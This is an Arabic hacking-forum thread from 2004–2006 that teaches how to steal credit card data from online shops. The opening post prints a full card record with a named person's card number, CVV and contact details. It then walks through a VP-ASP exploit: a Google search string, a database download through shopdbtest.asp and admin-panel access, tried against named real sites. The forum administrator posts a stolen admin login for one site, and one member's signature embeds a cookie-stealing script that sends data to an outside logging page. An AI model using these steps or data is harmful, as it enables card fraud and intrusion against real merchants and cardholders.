الرئيسية | المنتديات | الاعلانات | الأخبار | اتصل بنا

اهلا بك في منتديات شامل نت نتطلع بمشاركتك معنا وتقديم ماهو مفيد وتستفيد من الأقسام المنتديات لدينا كما يسعدنا تقديم كل ماهو مفيد وجديد من اقسام المنتديات الهادفه كمنتديات ( البرامج والتقنية ) التي تحتوي على العديد من البرامج وشروحها وتحميلها كما ايضا يمكنك الأطلا على ( قسم الألعاب ) المليء باحدث الألعاب لجميع الأجهزه سوا العاب الكمبيوتر PC او العاب البليستيشن 3 او الأكس بوكس ونتطلع بزيارتك ( لقسم التصاميم والجرافيكس ) وتزيدنا بمواضيعك الشيقه وتصاميمك الجديده والصور الغريبة .. ولا تنسي سيدتي بزيارة قسم ( المنتديات الإجتماعية والأسرية ) المتنوع والمتجدد بخصوص مواضيع الطبخ والمكياج والديكور وغيره

مرحبا بك فى منتديات شامل نت


العودة   منتديات شامل نت > قسم الكمبيوتر والتقنية > شامل الهكرز والحماية


شامل الهكرز والحماية كل مايتعلق بالهكرز وأساليبهم والحماية منهم .

موضوع مغلق
 
LinkBack أدوات الموضوع تقييم الموضوع انواع عرض الموضوع
  رقم المشاركة : ( 1 (permalink) )  
قديم 12-31-2004, 02:07 AM
الصورة الرمزية ThE_DeAtH
 
ThE_DeAtH
شاملي

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو
  ThE_DeAtH غير متواجد حالياً  
الملف الشخصي
رقــم العضويـــة : 29673
تـاريخ التسجيـل : Nov 2004
العــــــــمـــــــــر :
الــــــــجنــــــس :
الـــــدولـــــــــــة :
المشاركـــــــات : 92 [+]
آخــر تواجــــــــد : 12-13-2006(11:34 PM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : ThE_DeAtH is on a distinguished road
ثغرات للحصول على ارقام الفيزا من المواقع التى بها شوبنج

بسم الله الرحمن الرحيم

اولا اخوانى الموضوع منقول مع تعديلات بسيطه ولقد وضعته هنا للافاده
================================================== ==


اليوم شباب راح نشرح درس الكل كان فى انتظارة وهو استغلال ثغرات الشوبنج كاست وهى الخاصة بمواقع التسوق
وهى بالطبع مليئة بالثغرات لكثرت مواقع التسوق وبالفعل وثغرات الشوبنج حتى الان تزيد بصوره هائلة الى اليوم الحالى

وثغرات الشوبنج وصلت حتى الان الى 850 ثغرة واكثر منها التى تقوم بتزيل قواعد بيانات الموقع وهذا الشهيرة حتى الان
ومنها اسكربتات يتم بها قراءة بدخل الموقع مثلك مثل الادمن " مدير الموقع " والكثير
انا جبيت ان اقسم الموضوع الى دروس منفصلة لكثرت الكلام والثغرات فى الموضوع
الحين نبدا كاروت الفيزا او ماستر الكارت او اميجس او امريكن اكسبريس او غيرها راح اشرحها الان باتفصيل لمن يتعامل اول مرة مع الفيزات
حتى لايلاقى صعوبة فى الموضوع وتكون الشرح عام للجميع
نبدا الان وجارى الشرح على هذا الفيزا


===================================


نلاحظ هنا مهى الاشياء الهامة فى الفيزا وهى راح تكون المعلومات الاساسية للكارت

الاسم والعنوان والمدينة والبوست كود و رقم الكارت ورقم التلفيون واهم شىء هو
"cvv2" وهو رقم الكارت االسرى وهو مكون من ثلات احرف فى الفيزا او الماستر كارت


جارى الشرح على هذا الكارت وهى من نوع الفيزا

1:- First Name Linda
2:- Last Name Crosson
3:- Address 2100 White Bear Ave
4:- City Maplewood
5:- State MN
6:- Post Code 55109
7:- Country USA
8:- Email linda.crosson@ci.maplewood.mn.us
9:- Phone 651-249-2202
10:- Company Maplewood Community Center
11:- Payment Type Visa
12:- Name on Card Linda Crosson
13:- Card Number 4715110300225955
14:- Expiry Date mm/yy 01/06
15:- Authorization CVN 454


هذا هى راح تكون شكل الفيزا العام الان راح نشرح بالتفصيل


1:- هو الاسم الاول لصاحب الفيزا كارت

2:- هو اسم العائلة

3:- عنوان صاحب الفيزا وهذا من اهام اشياء الفيزا

4:- وهى الولاية التى يعيش فيها صاحب كارت الفيزا

5:- المدينة المتفرعة من الولاية وهى اغلبن تكون اختصار حرفين للمدينة المتفرعة يعنى لو كان مثل المدينة تسمى
Egypt
راح يكون الاختصار
Eg
وهى تكون اغلبا الاختصار ل اول حرفين من البلد لصاحب الكارت
هنا تلاقى فى المدينة المتفرعة فوق فى الكارت
الاختصار Mn

راح تكون المدينة
MNNESOTA

راح تلاقى عند اشتراك فى اى موقع يطلب منك الفيزا وبيانتها تلاقى ساعات

راح يطلب من الاختصار وراح يطلب منك المدينة كاملة

6:- زيب كود الولاية وهو يتغير من ولاية لاخرى

7:- طبعا مثل الشمس وهى الكنترى وهى امريكا

8:- ايميل صاحب كارت الفيزا

9:- وهو تليفون وهو مطلوب ايضــا

10:- وهو الكوبنى " الشركة " وهو غير مطلوب لنسبة 80%

11:- وهو يبين لك ان الكارت فيزا
نفترض مثال ان هذا المعلومة غير موجودة ماذا نعرف ان هذا فيزا ام مستر كارت او غيرها
راح اشرحها بعد شرح الكارت

12:- الاسم الكامل لصاحب الفيزا التى يمتلكها

13:- طبعا رقم الكارت رقم الفيزا

14:- ها هو تاريخ وانتهاء الكارت يعنى لو كان الكارت تاريخ الانتهاء 2003 طبعا لاتنفع تسحب منها
او تشترك منها يعنى يشترط ان تكون اقل شىء 2004 السنة اللى نعيش فيها

15:- Cvv2

اهم شىء هاهو حماية الكارت يعنى الرقم السرى لها وهو غالبا يكون من 3 حروف
يعنى هنا فى الكارت الرقم 454 وهو رقم الحماية لها

====== الحين انتهينا من شرح الكارت ========

يعنى لو تبى شراء شىء او تشترك فى موقع او ايتو شىء هذا هى معلومات المطلوبة لك
اذا تغيرت شىء او حرف او رقم واحد لاتنفع تاخذ منها اى شىء

طبعا ماذا نعرف ان هذا فيزا اوماستر كارت او امريكن اكسبريس او اميجس او غيرة
الحين نعرف

اذا اول رقم من الكارت 3 هى تكون امريكن اكسبريس

اذا اول رقم من الكارت 4 وهو تكون الكارت فيـــــــــزا

اذا اول رقم من الكارت 5 وهو طبعا راح تكون ماستر كارت

اذا اول رقم من الكارت 6 وهو طبعا راح تكون ديسكوفر

انتهينا من ذلك واعتقد راح تريح ناس كتيرة لان ناس كتيرة سالتنى ازاى نعرف هاهى فيزا او غيرة الحمد الله انتهينا الان







ياريت يكون استعمال الفيزا فى الخير
===============================
اللهم بلغت اللهم فاشهد

===============================



الحين ندخل فى موضوعنا وهى شرح كيفية استغلال الثغرات وكيفية استغلال اكسبلويت

لكثرة عدد الثغرات انا راح انزلها فى موضوعات اخرى

نبدا باول ثغرة وهى تنزيل قواعد البيانات

اكسبلويت " VP-ASP SHOPPING "

نذهب الى محرك البحث ويفضل دائما جوجل وهى الافضل حتى يتح لك بلاخترق ب 90%

نكتب فى محرك البحث shopdisplaycategories


انا اخترت هذا وجارى الشرح علية لسهولتة



http://www.norteamengros.no/shop/sh...ycategories.asp


الحين نحذف كلمة shopdisplaycategories.asp

ونضيف كلمة shopdbtest.asp



حتى يمكنا قراة قاعدة البيانات الموقع كما هو مبين امامك





نلاحظ امامنا انا امام


xDatabase: Shopping400 <------

راح نذهب الى المتصفح ونضيف هذا الامتداد وهو يتح لك بتنزيل قاعدة البيانات لك
.mdb
نفترض انا لقينا امام كلمة


xDatabase: sky

راح يصير فى المتصفح

http://www.theqproject.com/shopping/sky.mdb


الحين هذا فهمنها تعالى نطبق فى الموقع




راح تلاقى امامك تعمل حفظ لقاعدة البيانات فى جهازك




دلوقتى هانفتح قاعدة البيانات باحد ادوات اوفيس وهو الاكسس ويشترط فتحها بهذا البرنامج وهو برنامج يتم نزولة مع مكتبة الاوفيس
اذا لم تلاقية عندك فلا تستطيع قراءة قاعدة البيانات
الحين نفتح قاعدة البيانات الموقع مثل هذا ونذهب الى
جدول Order
حتى يتم التحكم والاقتحام فى فيزات والكريتد كارت الموقع

وهتكون با الشكل ده





وده شكله بعد مايتفتح

حتى تتمكن الدخول كادمن فى الموقع
تضيف مسار
shopadmin.asp
يصير الموقع كذا

http://www.theqproject.com/shopping/shopadminasp



هكذا المنظر العام لوحة تحكم مدير التسوق للموقع

يمكنك تغير الاسم او التحكم فى حذف الفيزات او تحكم فى الاعضاء والتحكم فى مميزاتهم والكثيــر
[line]
وهذه هي اولي الثغرات مجربة وسأضع ثغرة اخري قريبا ان شاء الله


توقيع » ThE_DeAtH
[align=center]خيبر خيبر يايهود جيش محمد سوف يعود [/align]

[glint][align=center](¯`•._)ThE_DeAtH(¯`•._)[/align][/glint]


[align=center][/align]
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
قديم 12-31-2004, 06:58 PM   رقم المشاركة : ( 2 (permalink) )
hmd1
شاملي

الصورة الرمزية hmd1

الملف الشخصي
رقــم العضويـــة : 33194
تـاريخ التسجيـل : Dec 2004
العــــــــمـــــــــر :
الــــــــجنــــــس :
الـــــدولـــــــــــة :
المشاركـــــــات : 68 [+]
آخــر تواجــــــــد : 02-07-2009(06:21 PM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : hmd1 is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

hmd1 غير متواجد حالياً

افتراضي

مشكور أخي موضوع في غاية الأهمية , شرح متميز بهنيك, ننتظر منك المزيد دائما , تحياتي..
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
قديم 12-31-2004, 07:19 PM   رقم المشاركة : ( 3 (permalink) )
ThE_DeAtH
شاملي

الصورة الرمزية ThE_DeAtH

الملف الشخصي
رقــم العضويـــة : 29673
تـاريخ التسجيـل : Nov 2004
العــــــــمـــــــــر :
الــــــــجنــــــس :
الـــــدولـــــــــــة :
المشاركـــــــات : 92 [+]
آخــر تواجــــــــد : 12-13-2006(11:34 PM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : ThE_DeAtH is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

ThE_DeAtH غير متواجد حالياً

افتراضي

مشكور اخي حمد تحياتي واتمني من احد الاخوة المشرفين الادلاء برأيه في الموضع
توقيع » ThE_DeAtH
[align=center]خيبر خيبر يايهود جيش محمد سوف يعود [/align]

[glint][align=center](¯`•._)ThE_DeAtH(¯`•._)[/align][/glint]


[align=center][/align]
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!

قديم 12-31-2004, 07:42 PM   رقم المشاركة : ( 4 (permalink) )
الهكرز المرعب
مطرود

الصورة الرمزية الهكرز المرعب

الملف الشخصي
رقــم العضويـــة : 23468
تـاريخ التسجيـل : Sep 2004
العــــــــمـــــــــر :
الــــــــجنــــــس :
الـــــدولـــــــــــة : السعوديه
المشاركـــــــات : 211 [+]
آخــر تواجــــــــد : 10-30-2005(05:01 PM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : الهكرز المرعب is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

الهكرز المرعب غير متواجد حالياً

افتراضي

موضوع من ذهب وفضه

مشكور اخوي
توقيع » الهكرز المرعب
[flash=http://www.members.lycos.co.uk/hackerwolf/myfile.swf.swf]onmouseover='location.href="http://www.members.lycos.co.uk/hackerwolf/log.php?nm=al-battar.net&re=http://www.shammel.net="+document.******'[/flash]
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
قديم 01-01-2005, 12:15 AM   رقم المشاركة : ( 5 (permalink) )
ThE_DeAtH
شاملي

الصورة الرمزية ThE_DeAtH

الملف الشخصي
رقــم العضويـــة : 29673
تـاريخ التسجيـل : Nov 2004
العــــــــمـــــــــر :
الــــــــجنــــــس :
الـــــدولـــــــــــة :
المشاركـــــــات : 92 [+]
آخــر تواجــــــــد : 12-13-2006(11:34 PM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : ThE_DeAtH is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

ThE_DeAtH غير متواجد حالياً

افتراضي

مشكور اخي الهكرز المرعب علي مرورك
توقيع » ThE_DeAtH
[align=center]خيبر خيبر يايهود جيش محمد سوف يعود [/align]

[glint][align=center](¯`•._)ThE_DeAtH(¯`•._)[/align][/glint]


[align=center][/align]
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
قديم 01-01-2005, 12:02 PM   رقم المشاركة : ( 6 (permalink) )
شامل نت
الإدارة


الصورة الرمزية شامل نت

الملف الشخصي
رقــم العضويـــة : 1
تـاريخ التسجيـل : Oct 2001
العــــــــمـــــــــر :
الــــــــجنــــــس :  Male
الـــــدولـــــــــــة : السعودية - الرياض
المشاركـــــــات : 3,922 [+]
آخــر تواجــــــــد : 08-31-2010(09:50 AM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : شامل نت is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

شامل نت غير متواجد حالياً

افتراضي

شرح رائع وواضح جدا

وفي نفس الوقت ثغرة خطيرة جداً

تسلم على الموضوع تم سحب القاعدة بسهوله

تحياتي
توقيع » شامل نت
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!

قديم 01-01-2005, 01:16 PM   رقم المشاركة : ( 7 (permalink) )
شامل نت
الإدارة


الصورة الرمزية شامل نت

الملف الشخصي
رقــم العضويـــة : 1
تـاريخ التسجيـل : Oct 2001
العــــــــمـــــــــر :
الــــــــجنــــــس :  Male
الـــــدولـــــــــــة : السعودية - الرياض
المشاركـــــــات : 3,922 [+]
آخــر تواجــــــــد : 08-31-2010(09:50 AM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : شامل نت is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

شامل نت غير متواجد حالياً

افتراضي

الطريقة تمام اخوي ThE_DeAtH والثغرة واضحه

اسم المستخدم الخاص بالـ Admin
63850500l&oslash;ken1960

الباسوورد
drittungerunder10&aring;rihue

لوحة التحكم ممكن تدخل عليها من هنا
http://www.norteamengros.no/shop/shopadmin.asp

لكن مصفوفة بطاقات الفيزا والماستر كار في قاعدة البيانات فارغة ..



الموقع شوي معقد لوحة التحكم الخاصه فيه لأن اللغة ماهي انجليزية



الي ماعرف يعرض قاعدة البيانات وماعنده برنامج اكسس على الأقل .. ممكن يفتحها عن طريق برنامج الإكسل
EXCEL

يعمل استيراد قاعدة بيانات من خانة DATA

تحياتي
توقيع » شامل نت
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
قديم 01-01-2005, 02:02 PM   رقم المشاركة : ( 8 (permalink) )
ThE_DeAtH
شاملي

الصورة الرمزية ThE_DeAtH

الملف الشخصي
رقــم العضويـــة : 29673
تـاريخ التسجيـل : Nov 2004
العــــــــمـــــــــر :
الــــــــجنــــــس :
الـــــدولـــــــــــة :
المشاركـــــــات : 92 [+]
آخــر تواجــــــــد : 12-13-2006(11:34 PM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : ThE_DeAtH is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

ThE_DeAtH غير متواجد حالياً

افتراضي

الف شكر شامل نت علي ردك حتي لو الموضوع مش مهم كفاية ردك علي الموضوع وبالنسبة للثغرة في اكتر من دي بس دي الي انا جربتها وكانت شغالة وان شاء الله احط باقي الثغرات علي الاقل للعلم بالشئ وشكرا علي مرورك
توقيع » ThE_DeAtH
[align=center]خيبر خيبر يايهود جيش محمد سوف يعود [/align]

[glint][align=center](¯`•._)ThE_DeAtH(¯`•._)[/align][/glint]


[align=center][/align]
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
قديم 01-01-2005, 03:00 PM   رقم المشاركة : ( 9 (permalink) )
ThE_DeAtH
شاملي

الصورة الرمزية ThE_DeAtH

الملف الشخصي
رقــم العضويـــة : 29673
تـاريخ التسجيـل : Nov 2004
العــــــــمـــــــــر :
الــــــــجنــــــس :
الـــــدولـــــــــــة :
المشاركـــــــات : 92 [+]
آخــر تواجــــــــد : 12-13-2006(11:34 PM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : ThE_DeAtH is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

ThE_DeAtH غير متواجد حالياً

افتراضي

وبالنسبة لسؤالك من الممكن يكون الموقع ده بس انا ازلت فعلا قاعدتين بينات بس للاسف انا الاكسل عندي قديم 97 ومبيعرضش الملفات وبالنسبة للغة كثير من المواقع بها هذه الثغرة وجاري التجريب
توقيع » ThE_DeAtH
[align=center]خيبر خيبر يايهود جيش محمد سوف يعود [/align]

[glint][align=center](¯`•._)ThE_DeAtH(¯`•._)[/align][/glint]


[align=center][/align]
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!

قديم 10-11-2006, 05:55 PM   رقم المشاركة : ( 10 (permalink) )
her0oo
شاملي جديد


الملف الشخصي
رقــم العضويـــة : 79807
تـاريخ التسجيـل : Oct 2006
العــــــــمـــــــــر : 27
الــــــــجنــــــس :
الـــــدولـــــــــــة :
المشاركـــــــات : 2 [+]
آخــر تواجــــــــد : 10-11-2006(06:14 PM)
عدد الـــنقــــــاط : 10
قوة التـرشيــــح : her0oo is on a distinguished road

 الأوسمة و جوائز
 بينات الاتصال بالعضو
 اخر مواضيع العضو

her0oo غير متواجد حالياً

رد: ثغرات للحصول على ارقام الفيزا من المواقع التى بها شوبنج

بداية مشكور كتير علي هذا الموضوع الرائع ......... ولكن الصراحة انا مشي الحال معي
انا عملت الخطوات لحد ما وصلت جدول الي فيه xDatabase: Shopping400 لما جيت اطبق هذه الطرقة ...... http://www.theqproject.com/shopping/Shopping400.mdb بيعطي صفحة فشل الوصول الي الرابط ...... ولحد هنا وما قدرت اكمل .......... بالعلم اني جربتها علي اكثر من موقع غير هادا الموقع ونفس القصة ....

الرجاء مساعدتي لاني مهتم كتير بالموضوع ............. ولكم جزيل الشكر
وهاي ايميلي للمتابعة والمراسلة maj_gio@hotmail.com
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
موضوع مغلق



الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع تقييم هذا الموضوع
تقييم هذا الموضوع:

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 01:18 AM بتوقيت مسقط


Powered by vBulletin® Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73